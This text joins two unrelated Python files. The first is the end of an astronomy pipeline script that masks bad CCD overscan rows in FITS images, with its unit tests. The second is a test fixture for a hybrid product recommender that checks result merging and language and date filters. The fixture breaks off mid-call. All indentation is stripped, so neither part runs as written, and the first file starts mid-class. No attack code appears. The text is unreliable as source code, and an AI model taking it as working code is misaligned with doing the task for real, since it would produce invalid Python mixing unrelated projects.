def getOffset(self, chipId):
return self[chipId]['offset']
###
def _parseOverscan(self, config):
def parseDirection(direction):
if direction == 'x':
self.setXOverscanDir()
else:
self.setYOverscanDir()
###
def parseMinOrMax(index):
if index == '1':
return self.setMin
else:
return self.setMax
###
parameterNames = config.keys()
for param in parameterNames:
match = re.match('ovscan([xy])(\d+)', param)
if match is None:
continue
parseDirection(match.group(1))
addPixVal = parseMinOrMax(match.group(2))
overscanBoundaries = getattr(config, param).iteritems()
for chipId, pixIndex in overscanBoundaries:
self.addChip(chipId)
addPixVal(chipId, pixIndex - 1)
###
def _parseOffset(self, config):
if self.isXDirection():
paramName = 'cuty'
else:
paramName = 'cutx'
offsets = getattr(config, paramName).iteritems()
for chip, offset in offsets:
self.setOffset(chip, offset)
###
def readConfig(self, config):
'''@param config a dictionary-interfaced object
config should have entries 'ovscan[x|y]',
and 'cut[x|y]
'''
self._parseOverscan(config)
self._parseOffset(config)
if not self.isInitialized():
raise BadInstrumentFileException
######################################################################
######################################################################
##############################
#USER METHODS
#############
def maskOverscanLines(image, overscanInfo, chipId,
buffer = 1,
threshold = 3.,
bumpWidth = 2):
'''
@brief Given an image, return polygons of areas to exclude due to a bad
overscan correction
@param image a 2d numpy array. First index is y dimension
@param overscanInfo an OverscanInfo object
@param chipId id key in overscanInfo corresponding to image
@param buffer number of rows around a detected overscan anomoly region
to also exclude
@param threshold detection threshold of overscan anomolies
@param bumpWidth required width of anomoly (in pixels) for detection
@returns a set of regionfile.Polygon objects
'''
overscan = rejectOutliersByLine(extractOverscan(image,
overscanInfo, chipId))
bumps = mergeBumps(findExclusions(overscan, threshold = threshold,
bumpWidth = bumpWidth))
if overscanInfo.isXDirection():
polygons = makePolygons(imageWidth = image.shape[1],
imageOffset = overscanInfo.getOffset(chipId),
ranges = bumps,
buffer = buffer)
else:
polygons = makePolygons(imageWidth = image.shape[0],
imageOffset = overscanInfo.getOffset(chipId),
ranges = bumps,
buffer = buffer,
vertical = True)
return polygons
######################################################################
def processDirectory(maindir, dir, prefix = '', buffer = 4,
threshold = 3., bumpWidth = 2):
'''
@brief Given a directory, process all images in directory for masking
@param maindir date_filter directory name
@param dir subdirectory to examine, eg, SCIENCE
@param prefix process only files starting with given prefix phrase
@param buffer number of rows around a detected overscan anomoly region
to also exclude
@param threshold detection threshold of overscan anomolies
@param bumpWidth required width of anomoly (in pixels) for detection
@effects Appends region files in the maindir/dir/reg directory with
masking info
NOTE: Assumes Bonn pipeline structures
'''
dirPath = '%s/%s' % (maindir, dir)
###
def getOverscanInfo():
if 'INSTRUMENT' not in os.environ:
raise NoInstrumentException
instrumentFile = '%s.ini' % os.environ['INSTRUMENT']
return OverscanInfo(bashreader.parseFile(instrumentFile))
###
def makeRegiondir():
regiondir = '%s/reg' % dirPath
if not os.path.exists(regiondir):
os.mkdir(regiondir)
return regiondir
###
def getImageFiles():
if os.path.exists('%s/SPLIT_IMAGES' % dirPath):
filenames = glob.glob('%s/SPLIT_IMAGES/*.fits' % dirPath)
else:
filenames = glob.glob('%s/*.fits' % dirPath)
if len(filenames) == 0:
raise NothingToDoException
return filenames
###
def getImage(filename):
fitsFile = pyfits.open(fullFilename)
image = fitsFile[0].data
fitsFile.close()
return image
###
overscanInfo = getOverscanInfo()
regiondir = makeRegiondir()
filenames = getImageFiles()
for fullFilename in filenames:
filename = os.path.basename(fullFilename)
print 'Processing %s...' % filename
match = re.match('(%s\d+_(\d+))\.fits' % prefix, filename)
if match is None:
print '! Skipping %s' % filename
continue
basename = match.group(1)
chipId = int(match.group(2))
image = getImage(filename)
maskedRegions = maskOverscanLines(image, overscanInfo, chipId,
buffer = buffer,
threshold = threshold,
bumpWidth = bumpWidth)
regionFilename = '%s/%s.reg' % (regiondir, basename)
regionfile.writeRegionFile(regionFilename, maskedRegions)
##########################################################################
##########################################################################
##################################
#UTILITY METHODS
################
def extractOverscan(image, overscanInfo, chipId):
if overscanInfo.isYDirection():
#because default fits image has y as first axis
image = image.transpose()
xmin = overscanInfo.getMin(chipId)
xmax = overscanInfo.getMax(chipId)
overscan = image[:,xmin:xmax]
return overscan
############################################################################
def rejectOutliersByLine(image):
reducedImage = numpy.zeros((image.shape[0], image.shape[1]-2))
for i in xrange(len(image)):
a = image[i]
minPix = a.argmin()
a = numpy.hstack([a[0:minPix],a[minPix+1:]])
maxPix = a.argmax()
a = numpy.hstack([a[0:maxPix],a[maxPix+1:]])
reducedImage[i] = a
return reducedImage
###############################################################################
def _convertToIndices(boolArray):
return numpy.arange(len(boolArray))[boolArray]
###############################################################################
class _piecewiseLinear(object):
def __init__(self, x1, x2):
self.x1 = x1
self.x2 = x2
###
def __call__(self, x, params):
Aa = params[0]
Ab = params[1]
Ac = params[2]
Bc = params[3]
Bb = (Ac - Ab)*self.x2 + Bc
Ba = (Ab - Aa)*self.x1 + Bb
Ya = Aa*x + Ba
Yb = Ab*x + Bb
Yc = Ac*x + Bc
return numpy.where(x <= self.x1, Ya, numpy.where(x <= self.x2, Yb, Yc))
##############################################################################
def findExclusions(image, threshold = 3, bumpWidth = 2):
marginalizedImage = numpy.sum(image, axis=1)
X = numpy.arange(len(marginalizedImage))
backgroundModel = _piecewiseLinear(len(marginalizedImage)/3,
2*len(marginalizedImage)/3)
######################
def findBumps(knownBumps):
imageNoBumps = marginalizedImage[numpy.logical_not(knownBumps)]
xNoBumps = X[numpy.logical_not(knownBumps)]
average = numpy.mean(imageNoBumps)
bkgroundParams, chisq, covar, isConverged = \
leastsq.leastsq(backgroundModel, [0,0,0,average],
xNoBumps, imageNoBumps, fullOutput = True)
bkground = backgroundModel(X, bkgroundParams)
stddev = numpy.sqrt(numpy.mean( \
(bkground[numpy.logical_not(knownBumps)] - imageNoBumps)**2))
candidates = marginalizedImage > (bkground + threshold*stddev)
###########
def filterOverBumpWidth(candidates, operator):
filtered = candidates
for i in xrange(1,bumpWidth):
filtered = operator(candidates, numpy.roll(candidates, i))
filtered[0:i] = candidates[0:i]
filtered = operator(filtered, numpy.roll(candidates, -i))
filtered[-i:] = candidates[-i:]
return filtered
############
randomsEliminated = filterOverBumpWidth(candidates,
numpy.logical_and)
bumps = filterOverBumpWidth(randomsEliminated, numpy.logical_or)
return bumps
###############
nExcludedRows = 0
excluded = findBumps(numpy.array(len(marginalizedImage)*[False]))
while len(excluded[excluded==True]) > nExcludedRows:
nExcludedRows = len(excluded[excluded==True])
excluded = findBumps(excluded)
return _convertToIndices(excluded).tolist()
######################################################################
###
def _nextElementIsContinuous(alist, curVal):
return len(alist) > 0 and alist[-1] == (curVal + 1)
###
def mergeBumps(bumps):
sortedBumps = sorted(bumps, reverse=True)
ranges = []
while len(sortedBumps) != 0:
min = sortedBumps.pop()
max = min
while _nextElementIsContinuous(sortedBumps, max):
max = sortedBumps.pop()
ranges.append((min,max))
return ranges
######################################################################
def makePolygons(imageWidth, imageOffset, ranges, buffer = 1, vertical = False):
def makeHorizontalBox(arange):
return [0, arange[0] - imageOffset - buffer,
imageWidth, arange[0] - imageOffset - buffer,
imageWidth, arange[1] - imageOffset + buffer,
0, arange[1] - imageOffset + buffer]
###
def makeVerticalBox(arange):
return [arange[0] - imageOffset - buffer , 0,
arange[1] - imageOffset + buffer, 0,
arange[1] - imageOffset + buffer, imageWidth,
arange[0] - imageOffset - buffer, imageWidth]
###
def applyFitsStartsat1Offset(box):
return [x+1 for x in box]
###
makeBox = makeHorizontalBox
if vertical:
makeBox = makeVerticalBox
regions = []
for arange in ranges:
regions.append(regionfile.Polygon(applyFitsStartsat1Offset( \
makeBox(arange)) ) )
return regions
########################################################################
########################################################################
#######################
#TESTING CLASSES
#########
class TestOverscanInfo(unittest.TestCase):
def setUp(self):
configTxt = '''
OVSCANX1=([6]=1 [7]=1 [3]=1 [4]=1 [9]=1 [8]=2055 [1]=2065 [2]=2055 [5]=2055 [10]=1)
OVSCANX2=([6]=28 [7]=28 [3]=28 [4]=28 [9]=28 [8]=2080 [1]=2080 [2]=2080 [5]=2080 [10]=28)
CUTX=([6]=40 [7]=40 [3]=40 [4]=40 [9]=40 [8]=40 [1]=40 [2]=40 [5]=40 [10]=40)
CUTY=([6]=10 [7]=10 [3]=10 [4]=10 [9]=10 [8]=10 [1]=10 [2]=10 [5]=10 [10]=10)
SIZEX=([6]=2000 [7]=2000 [3]=2000 [4]=2000 [9]=2000 [8]=2000 [1]=2000 [2]=2000 [5]=2000 [10]=2000)
SIZEY=([6]=4080 [7]=4080 [3]=4080 [4]=4080 [9]=4080 [8]=4080 [1]=4080 [2]=4080 [5]=4080 [10]=4080)
'''
self.config = bashreader.parse(configTxt)
def testGoodInstrumentFile(self):
overscanRegions = OverscanInfo(self.config)
self.assertEquals(overscanRegions.getMin(1), 2064)
self.assertEquals(overscanRegions.getMax(1), 2080)
self.assertEquals(overscanRegions.getMin(2), 2054)
self.assertEquals(overscanRegions.getMax(2), 2080)
self.assertEquals(overscanRegions.getMin(3), 0)
self.assertEquals(overscanRegions.getMax(3), 28)
self.assertEquals(overscanRegions.getMin(4), 0)
self.assertEquals(overscanRegions.getMax(4), 28)
self.assertEquals(overscanRegions.getMin(5), 2054)
self.assertEquals(overscanRegions.getMax(5), 2080)
self.assertEquals(overscanRegions.getMin(6), 0)
self.assertEquals(overscanRegions.getMax(6), 28)
self.assertEquals(overscanRegions.getMin(7), 0)
self.assertEquals(overscanRegions.getMax(7), 28)
self.assertEquals(overscanRegions.getMin(8), 2054)
self.assertEquals(overscanRegions.getMax(8), 2080)
self.assertEquals(overscanRegions.getMin(9), 0)
self.assertEquals(overscanRegions.getMax(9), 28)
self.assertEquals(overscanRegions.getMin(10), 0)
self.assertEquals(overscanRegions.getMax(10), 28)
self.assertTrue(overscanRegions.isXDirection())
self.assertFalse(overscanRegions.isYDirection())
self.assertEquals(overscanRegions.getOffset(1), 10)
self.assertEquals(overscanRegions.getOffset(2), 10)
self.assertEquals(overscanRegions.getOffset(3), 10)
self.assertEquals(overscanRegions.getOffset(4), 10)
self.assertEquals(overscanRegions.getOffset(5), 10)
self.assertEquals(overscanRegions.getOffset(6), 10)
self.assertEquals(overscanRegions.getOffset(7), 10)
self.assertEquals(overscanRegions.getOffset(8), 10)
self.assertEquals(overscanRegions.getOffset(9), 10)
self.assertEquals(overscanRegions.getOffset(10), 10)
###################
class TestExtractOverscanRegion(unittest.TestCase):
def setUp(self):
overscan = OverscanInfo()
overscan.setXOverscanDir()
overscan.addChip(1)
overscan.setMin(1, 0)
overscan.setMax(1, 29)
overscan.setOffset(1, 5)
self.overscanInfo = overscan
self.level = 10000
self.sigma = .5
self.ysize = 100
self.image = numpy.hstack([self.level + \
self.sigma*numpy.random.standard_normal( \
size=(self.ysize, self.overscanInfo.getMax(1))),
-self.level + self.sigma*numpy.random.standard_normal( \
size=(self.ysize,5))])
def testExtractOverscan(self):
overscan = extractOverscan(self.image, self.overscanInfo, chipId = 1)
self.assertEquals(overscan.shape, (100,30))
################################
class TestFitOverscanRegion(unittest.TestCase):
def setUp(self):
self.level = 10000
self.sigma = .5
self.xsize = 30
self.ysize = 100
self.image = self.level + self.sigma*numpy.random.standard_normal( \
size=(self.ysize, self.xsize))
def testRejectOutliers(self):
self.image[5,3] = 10500
self.image[7,1] = 11200
overscan = rejectOutliersByLine(self.image)
self.assertEquals(overscan.shape, (self.ysize,
self.xsize - 2))
self.assertTrue((overscan[5] != 10500).any())
self.assertTrue((overscan[7] != 11200).any())
def testRejectOutliersAllSame(self):
image = numpy.array([5*[3.],5*[2.]])
self.assertTrue(numpy.array_equal(rejectOutliersByLine(image),
numpy.array([3*[3.],3*[2.]])))
def testRowConstOffset(self):
self.image[45,:] += 5*self.sigma
self.assertEquals(findExclusions(self.image, bumpWidth=1), [45])
def testFind2Bumps(self):
self.image[20,:] += 2*self.sigma
self.image[21,:] += 2*self.sigma
self.image[22,:] += 2*self.sigma
self.image[44,:] += 10*self.sigma
self.image[45,:] += 10*self.sigma
self.image[46,:] += 10*self.sigma
self.assertEquals(findExclusions(self.image), [20,21,22,44,45,46])
def testNoBump(self):
self.assertEquals(findExclusions(self.image), [])
def testEqualSensitivity(self):
bumpsNotDetected = []
for i in xrange(1, 99):
image = numpy.ones((100,10))
image[i-1:i+2,:] *= 5
if not (findExclusions(image) == range(i-1,i+2)):
bumpsNotDetected.append(i)
print "Bumps not detected: %s" % str(bumpsNotDetected)
self.assertEquals(0, len(bumpsNotDetected))
#########################################################################
class TestCreateRegion(unittest.TestCase):
def testSingleRegionMerge(self):
bumps = [45,46,47]
self.assertEquals(mergeBumps(bumps), [(45,47)])
def testDoubleRegionMerge(self):
bumps = [41,42,43,45,46,47]
self.assertEquals(mergeBumps(bumps), [(41,43), (45,47)])
#remember: shift by +1 for fits files
#add 1 pix buffer either side
def testMakePolygons(self):
mergedRows = [(41,43)]
imageWidth = 40
imageOffset = 5
self.assertEquals(makePolygons(imageWidth, imageOffset, mergedRows),
[regionfile.Polygon([1,36,41,36,41,40,1,40])])
def testCreate2Polygons(self):
mergedRows = [(19,25),(41,43)]
imageWidth = 40
imageOffset = 5
regions = makePolygons(imageWidth, imageOffset, mergedRows)
self.assertEquals(len(regions), 2)
self.assertTrue(regionfile.Polygon([1,36,41,36,41,40,1,40]) in regions)
self.assertTrue(regionfile.Polygon([1,14,41,14,41,22,1,22]) in regions)
def testYDirection(self):
mergedRows = [(41,43)]
imageWidth = 40
imageOffset = 5
self.assertEquals(makePolygons(imageWidth, imageOffset,
mergedRows, vertical=True),
[regionfile.Polygon([36,1,40,1,40,41,36,41])])
def testAddBuffer(self):
mergedRows = [(41,43)]
imageWidth = 40
imageOffset = 5
buffer = 3
self.assertEquals(makePolygons(imageWidth, imageOffset, mergedRows,
buffer = buffer),
[regionfile.Polygon([1,34,41,34,41,42,1,42])])
#########################################################################
class TestRealBump(unittest.TestCase):
def setUp(self):
self.overscan = TestBadOverscansTestData.realbump
self.image = rejectOutliersByLine(self.overscan)
def testFindRealBump(self):
#doesn't have anything outside 58 - 84, but has at least 62-80
exclude = numpy.array(findExclusions(self.image))
self.failIf(numpy.logical_or(exclude < 58, exclude > 84).any())
for i in xrange(62,81):
self.failIf((exclude != i).all(), 'Missing: %d' % i)
###################################################################
class TestRealDataNoDetect(unittest.TestCase):
def setUp(self):
self.image = TestBadOverscansTestData.nodetect
configTxt = '''
OVSCANX1=([6]=1 [7]=1 [3]=1 [4]=1 [9]=1 [8]=2055 [1]=2065 [2]=2055 [5]=2055 [10]=1)
OVSCANX2=([6]=28 [7]=28 [3]=28 [4]=28 [9]=28 [8]=2080 [1]=2080 [2]=2080 [5]=2080 [10]=28)
CUTX=([6]=40 [7]=40 [3]=40 [4]=40 [9]=40 [8]=40 [1]=40 [2]=40 [5]=40 [10]=40)
CUTY=([6]=10 [7]=10 [3]=10 [4]=10 [9]=10 [8]=10 [1]=10 [2]=10 [5]=10 [10]=10)
SIZEX=([6]=2000 [7]=2000 [3]=2000 [4]=2000 [9]=2000 [8]=2000 [1]=2000 [2]=2000 [5]=2000 [10]=2000)
SIZEY=([6]=4080 [7]=4080 [3]=4080 [4]=4080 [9]=4080 [8]=4080 [1]=4080 [2]=4080 [5]=4080 [10]=4080)
'''
self.overscan = OverscanInfo(bashreader.parse(configTxt))
####
def testNoDetect(self):
regions = maskOverscanLines(self.image, self.overscan, 7)
self.assertEquals(len(regions), 0)
###################################################################
class TestProcessChip(unittest.TestCase):
def testXDirectionChip(self):
image = numpy.ones((50,30))
overscan = OverscanInfo()
overscan.setXOverscanDir()
overscan.addChip(1)
overscan.setMin(1, 0)
overscan.setMax(1, 9)
overscan.setOffset(1, 5)
image[10:14,0:10] *= 5
regions = maskOverscanLines(image, overscan, 1)
self.assertEquals(regions, [regionfile.Polygon([1,5,31,5,31,10,1,10])])
#######
def testYDirectionChip(self):
image = numpy.ones((30,50))
overscan = OverscanInfo()
overscan.setYOverscanDir()
overscan.addChip(1)
overscan.setMin(1, 20)
overscan.setMax(1, 29)
overscan.setOffset(1, 5)
image[20:,10:14] *= 5
regions = maskOverscanLines(image, overscan, 1)
self.assertEquals(regions, [regionfile.Polygon([5,1,10,1,10,31,5,31])])
###################################################################
###################################################################
###########################
# METHODS FOR SCRIPT MODE
#############
def test():
testcases = [TestOverscanInfo, TestFitOverscanRegion,
TestExtractOverscanRegion, TestRealBump,
TestCreateRegion, TestProcessChip,
TestRealDataNoDetect]
suite = unittest.TestSuite(map(unittest.TestLoader().loadTestsFromTestCase,
testcases))
unittest.TextTestRunner(verbosity=2).run(suite)
#################################
def main():
parser = OptionParser(usage)
parser.add_option('-b', '--buffer-size', dest='buffer',
help='Num rows around detected region to exclude',
type = int, default = 5)
parser.add_option('-t', '--threshold', dest='threshold',
help='Detection threshold for stars in overscan region',
type = float, default = 3)
parser.add_option('-w', '--bump-width', dest='bumpWidth',
help='Required width of a bump for detection (in pix)',
type = int, default = 2)
(options, args) = parser.parse_args()
if len(args) != 3:
parser.print_help()
sys.exit(1)
maindir = args[0]
dir = args[1]
prefix = args[2]
processDirectory(maindir, dir, prefix,
buffer = options.buffer,
threshold = options.threshold,
bumpWidth = options.bumpWidth)
#################################
if __name__ == '__main__':
if len(sys.argv) < 2 :
print usage
sys.exit(1)
if sys.argv[1] == 'test':
test()
else:
__bonn_logger_id__ = BonnLogger.addCommand('maskBadOverscans.py',
sys.argv[1:])
main()
BonnLogger.updateStatus(__bonn_logger_id__, 0)
| |
""" Test fixture for hybrid recommendations.
"""
import datetime as dt
import nose.tools
import barbante.context as ctx
import barbante.maintenance.product_templates as pt
import barbante.maintenance.product_templates_tfidf as pt_tfidf
import barbante.maintenance.user_templates as ut
from barbante.recommendation.tests.fixtures.RecommenderFixture import RecommenderFixture
import barbante.tests as tests
class HybridRecommenderFixture(RecommenderFixture):
""" Class for testing barbante.recommendation.HybridRecommender subclasses.
"""
def setup(self):
super().setup()
ut.generate_templates(self.session_context)
pt.generate_templates(self.session_context)
pt_tfidf.generate_templates(self.session_context)
def test_recommend(self, test_recommendation_quality=True):
""" Tests whether meaningful recommendations were obtained.
"""
super().test_recommend(test_recommendation_quality=False)
def test_recommend_with_exception_in_one_concrete_recommender(self):
""" Tests whether the hybrid recommender recovers from a failure in one of the specialists.
"""
session = tests.init_session(user_id="u_eco_1", algorithm=self.algorithm)
session.algorithm_weights = {self.algorithm: [["Mock", 1.0]]}
session.fill_in_algorithm = None
recommender = session.get_recommender()
result = recommender.recommend(self.n_recommendations)
nose.tools.eq_(result, [], "A failure in a specialist algorithm should yield an empty list")
def test_recommend_non_existing_user(self):
""" Tests whether meaningful recommendations are returned even for unknown users.
"""
session = tests.init_session(user_id="Invalid user id", algorithm=self.algorithm)
recommender = session.get_recommender()
results = recommender.recommend(self.n_recommendations)
nose.tools.ok_(len(results) > 0, "Hybrid recommenders should recommend even for unknown users")
def test_recommend_anonymous_user(self):
""" Tests whether valid recommendations are returned for an anonymous user.
"""
session = tests.init_session(user_id="hmrtmp_AnonymousUser1", algorithm=self.algorithm)
recommender = session.get_recommender()
results = recommender.recommend(self.n_recommendations)
nose.tools.ok_(len(results) > 0, "Hybrid recommenders should recommend even for anonymous users")
def test_fill_in_products(self):
""" Tests the merge based on fixed slices.
"""
n_recommendations = 30
recommendations_by_alg = {"UBCF": [[[50], "UBCF_1"],
[[30], "UBCF_2"],
[[10], "UBCF_3"],
[[5], "UBCF_4"],
[[2], "UBCF_5"]],
"PBCF": [[[50], "PBCF_1"],
[[30], "PBCF_2"],
[[10], "PBCF_3"],
[[5], "PBCF_4"]],
"CB": [[[50], "CB_1"],
[[40], "CB_2"],
[[30], "CB_3"],
[[20], "CB_4"],
[[10], "CB_5"],
[[9], "CB_6"],
[[8], "CB_7"],
[[7], "CB_8"],
[[4], "CB_9"]],
"POP": [[[50], "POP_1"],
[[30], "POP_2"],
[[10], "POP_3"],
[[5], "POP_4"],
[[4], "POP_5"],
[[3], "POP_6"],
[[4], "POP_7"]]}
session = tests.init_session(user_id="u_eco_1", algorithm=self.algorithm)
recommender = session.get_recommender()
merged_recommendations = recommender.merge_algorithm_contributions(recommendations_by_alg, n_recommendations)
recommender.include_fill_in_recommendations(merged_recommendations, recommendations_by_alg, n_recommendations)
products_rank = [rec[1] for rec in merged_recommendations]
for item in products_rank[18:]:
nose.tools.ok_(item.startswith("POP_"), "Wrong rank after merge")
def test_history_decay_step(self):
# It is not easy to test decays here, since the same item can be recommended by different algorithms.
# Since the decay logic is applied by the base Recommender, no big deal we do not repeat the test here.
pass
def test_history_decay_rational(self):
# It is not easy to test decays here, since the same item can be recommended by different algorithms.
# Since the decay logic is applied by the base Recommender, no big deal we do not repeat the test here.
pass
def test_history_decay_exponential(self):
# It is not easy to test decays here, since the same item can be recommended by different algorithms.
# Since the decay logic is applied by the base Recommender, no big deal we do not repeat the test here.
pass
def test_history_decay_linear(self):
# It is not easy to test decays here, since the same item can be recommended by different algorithms.
# Since the decay logic is applied by the base Recommender, no big deal we do not repeat the test here.
pass
def test_in_boost(self):
# It is not easy to test in-boosts here, since the same item can be recommended by different algorithms.
# Since the in-boost logic is applied by the base Recommender, no big deal we do not repeat the test here.
pass
def test_product_age_decay_exponential(self):
# It is not easy to test decays here, since the same item can be recommended by different algorithms.
# Since the decay logic is applied by the base Recommender, no big deal we do not repeat the test here.
pass
def test_pre_filter_returning_all(self):
target_user = "u_tec_1"
custom_settings = {
'filter_strategy': ctx.BEFORE_SCORING
}
intended_count = self.db_proxy.get_product_model_count()
self._check_empty_filter_returning_all_products(custom_settings, intended_count, target_user)
def test_pos_filter_returning_all(self):
target_user = "u_tec_1"
custom_settings = {
'filter_strategy': ctx.AFTER_SCORING
}
session = tests.init_session(user_id=target_user, custom_settings=custom_settings, algorithm=self.algorithm)
recommender = session.get_recommender()
intended_count = len(recommender.recommend(1000))
self._check_empty_filter_returning_all_products(custom_settings, intended_count, target_user)
def test_pre_vs_pos_filter_without_missing_pre_filtered_candidates(self):
filter_string = '{"language": "portuguese", "category": "Economia"}'
n_recommendations = 4
self._check_pre_and_pos_filters_match(filter_string, n_recommendations)
def test_pre_vs_pos_filter_with_missing_pre_filtered_candidates(self):
filter_string = '{"language": "portuguese"}'
n_recommendations = 15
self._check_pre_and_pos_filters_match(filter_string, n_recommendations)
def test_pre_filter_returning_none(self):
self._check_result_is_none_for_bad_filter(ctx.BEFORE_SCORING)
def test_pos_filter_returning_none(self):
self._check_result_is_none_for_bad_filter(ctx.AFTER_SCORING)
def test_pre_filter_with_language(self):
self._check_language_filter(ctx.BEFORE_SCORING)
def test_pos_filter_with_language(self):
self._check_language_filter(ctx.AFTER_SCORING)
def test_pre_filter_with_german_language(self):
strategy = ctx.BEFORE_SCORING
intended_count = 3
self._check_number_of_filtered_products(intended_count, strategy)
def test_pos_filter_with_german_language(self):
strategy = ctx.AFTER_SCORING
intended_count = 2
self._check_number_of_filtered_products(intended_count, strategy)
def test_pre_filter_with_basic_and_parameters(self):
strategy = ctx.BEFORE_SCORING
intended_count = 3
self._check_basic_and_filters(intended_count, strategy)
def test_pos_filter_with_basic_and_parameters(self):
strategy = ctx.AFTER_SCORING
intended_count = 2
self._check_basic_and_filters(intended_count, strategy)
def test_pre_filter_with_basic_or_parameters(self):
strategy = ctx.BEFORE_SCORING
intended_count = 5
self._check_basic_or_filters(intended_count, strategy)
def test_pos_filter_with_basic_or_parameters(self):
strategy = ctx.AFTER_SCORING
intended_count = 5
self._check_basic_or_filters(intended_count, strategy)
def test_pre_filter_with_list_filter(self):
product_count = self.db_proxy.get_product_model_count()
target_user = "u_filter_1"
custom_settings = {
'filter_strategy': ctx.BEFORE_SCORING
}
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "german",'
'"source": "source2"}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(product_count > 0, 'The filter test requires products to exist')
nose.tools.eq_(len(filtered_products), 2)
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "german",'
'"source": "source1"}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(len(filtered_products), 1)
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "german",'
'"source": ["source2", "source3"]}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(len(filtered_products), 2)
def test_pos_filter_with_list_filter(self):
product_count = self.db_proxy.get_product_model_count()
target_user = "u_filter_1"
custom_settings = {
'filter_strategy': ctx.AFTER_SCORING
}
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "german",'
'"source": "source2"}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(product_count > 0, 'The filter test requires products to exist')
nose.tools.eq_(len(filtered_products), 1)
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "german",'
'"source": "source1"}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.eq_(len(filtered_products), 0)
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "german",'
'"source": ["source2", "source3"]}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(len(filtered_products), 1)
def test_pre_filter_with_dates(self):
product_count = self.db_proxy.get_product_model_count()
target_user = "u_filter_1"
custom_settings = {
'filter_strategy': ctx.BEFORE_SCORING
}
date = self.session_context.get_present_date()
date_str = date.isoformat()
session = tests.init_session(
user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{{"language": "german","date": "{0}"}}'.format(
date_str),
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(product_count > 0, 'The filter test requires products to exist')
nose.tools.eq_(len(filtered_products), 3)
one_hour_before = date - dt.timedelta(hours=1)
one_hour_after = date + dt.timedelta(hours=1)
session = tests.init_session(
user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{{"language": "german","date": {{"$gt": "{0}"}}}}'.format(
one_hour_before.isoformat()),
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.eq_(len(filtered_products), 3)
session = tests.init_session(
user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{{"language": "german","date": {{"$lt": "{0}"}}}}'.format(
one_hour_before.isoformat()),
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.eq_(len(filtered_products), 0)
session = tests.init_session(
user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{{"language": "german","date": {{"$lt": "{0}"}}}}'.format(
one_hour_after.isoformat()),
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.eq_(len(filtered_products), 3)
session = tests.init_session(
user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{{"language": "german","date": {{"$lt": "{0}"}}}}'.format(
one_hour_before.isoformat()),
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.eq_(len(filtered_products), 0)
session = tests.init_session(
user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{{"language": "german","date": {{"$gt": "{0}", "$lt": "{1}"}}}}'.format(
one_hour_before.isoformat(), one_hour_after.isoformat()),
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.eq_(len(filtered_products), 3)
session = tests.init_session(
user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{{"language": "german","date": {{"$lt": "{0}", "$gt": "{1}"}}}}'.format(
one_hour_before.isoformat(), one_hour_after.isoformat()),
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.eq_(len(filtered_products), 0)
def test_pos_filter_with_dates(self):
product_count = self.db_proxy.get_product_model_count()
target_user = "u_filter_1"
custom_settings = {
'filter_strategy': ctx.AFTER_SCORING
}
date = self.session_context.get_present_date()
date_str = date.isoformat()
session = tests.init_session(
user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{{"language": "german","date": "{0}"}}'.format(date_str),
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(product_count > 0, 'The filter test requires products to exist')
nose.tools.eq_(len(filtered_products), 2)
one_hour_before = date - dt.timedelta(hours=1)
one_hour_after = date + dt.timedelta(hours=1)
session = tests.init_session(
user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{{"language": "german","date": {{"$gt": "{0}"}}}}'.format(
one_hour_before.isoformat()),
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.eq_(len(filtered_products), 2)
session = tests.init_session(
user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{{"language": "german","date": {{"$lt": "{0}"}}}}'.format(
one_hour_before.isoformat()),
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.eq_(len(filtered_products), 0)
session = tests.init_session(
user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{{"language": "german","date": {{"$lt": "{0}"}}}}'.format(
one_hour_after.isoformat()),
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.eq_(len(filtered_products), 2)
session = tests.init_session(
user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{{"language": "german","date": {{"$lt": "{0}"}}}}'.format(
one_hour_before.isoformat()),
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.eq_(len(filtered_products), 0)
session = tests.init_session(
user_id=target_user,
